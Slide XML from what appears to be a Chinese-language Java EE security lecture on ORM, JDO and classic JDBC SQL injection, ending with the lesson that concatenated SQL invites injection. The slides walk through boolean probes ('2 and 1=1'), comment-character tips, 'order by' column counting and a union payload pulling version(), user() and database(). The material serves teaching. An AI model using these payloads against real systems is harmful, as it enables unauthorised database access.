        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ORM:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>对象关系映射（ORM）目前有Hibernate、OpenJPA、TopLink、</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>EclipseJPA等实现。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>JDO:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>JDO(Java Data Object )是Java对象持久化的新的规范，也是一个</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>用于存取某种数据仓库中的对象的标准化API。没有听说过JDO没</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>有关系，很多人应该知道PDO,ADO吧？概念一样。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRP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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>经典的JDBC的Sql注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Sql注入产生的直接原因是拼凑SQL，绝大多数程序员在做开发的</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>时候并不会去关注SQL最终是怎么去运行的，更不会去关注SQL执</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>行的安全性。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="785495" y="2214880"/>
            <a:ext cx="6571615" cy="2428875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>JavaEE 基础</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>一个普通的jsp脚本页面，因为我只用JSP来作为展示层仅仅做了简单的后端数据的</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>页面展示：</a:t>
            </a:r>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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1882775" y="1024255"/>
            <a:ext cx="4975225" cy="3719830"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>经典的JDBC的Sql注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>下图代码是一个取数据和显示数据的过程。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="785495" y="1577340"/>
            <a:ext cx="6600190" cy="3066415"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4459605" y="2359660"/>
            <a:ext cx="4466590" cy="2057400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>经典的JDBC的Sql注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>当参数为2 and 1=1去查询时，由于1=1为true所以能够正常的返</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>回查询结果：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="785495" y="1851025"/>
            <a:ext cx="5466715" cy="1905000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>经典的JDBC的Sql注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>当传入参数2 and 1=2时查询结果是不存在的，所以没有显示任何</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>结果。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Tips:在某些场景下可能需要在参数末尾加注释符--,使用“--”的作用在于注释掉从当前代码末</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>尾到SQL末尾的语句。--在oracle和mssql都可用，mysql可以用# /**。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2013585" y="1597660"/>
            <a:ext cx="4457065" cy="1581150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>经典的JDBC的Sql注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>执行order by 4正常显示数据order by 5错误说明查询的字段数是</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1379220" y="1698625"/>
            <a:ext cx="4885690" cy="2257425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>经典的JDBC的Sql注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Order by 5执行后直接爆了一个SQL异常： </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1099820" y="1581150"/>
            <a:ext cx="6285865" cy="1981200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>经典的JDBC的Sql注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>用联合查询执行:2 and 1=2 union select </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>version(),user(),database(),5 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2673985" y="213995"/>
            <a:ext cx="6134735" cy="509079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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>结论</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>通过控制台执行SQL注入可知SQL注入跟平台无关、跟开发语言</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>关系也不大，而是跟数据库有关。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.拼SQL肯定是会造成SQL注入的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
